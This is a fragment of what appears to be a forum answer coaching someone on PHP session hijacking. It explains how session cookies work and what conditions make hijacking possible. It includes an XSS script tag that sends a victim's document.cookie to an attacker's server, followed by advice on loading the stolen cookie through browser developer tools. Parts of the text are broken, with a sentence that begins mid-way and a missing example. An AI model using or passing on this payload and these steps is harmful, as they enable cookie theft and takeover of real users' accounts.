...php writes the cookie into a file. (I think that is one of the
From what you wrote above, it seems that there could be some misconception with your understanding on how a session is being created and maintained on a website. When a user logs in to a website, a session id is generated and this id is stored in a special cookie, known as the session cookie, on the client's browser, like this:
At the same time, a session file (or database row) with the same id is created containing variables (such as user name, login time) related to that particular user. These session variables are stored server side and called from the superglobal
$_SESSION array when a session is started.
To hijack a session, what you need is a cookie containing the name-value pair like the one above. One precondition is that the victim must be logged in during the attack such that the session file with the stolen id is still fresh on the server. Also, the website must not be doing other extraneous checks (such as user agent or IP address) to thwart hijackers.
<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>
$_GET array. What you want is to transmit the name-value pair using your browser cookie, certainly not with the URL.
Most modern browsers store the cookie information in a database such as sqlite. To edit a cookie, you need to access the web console or the developer toolbar which is covered here for Chrome and here for Firefox.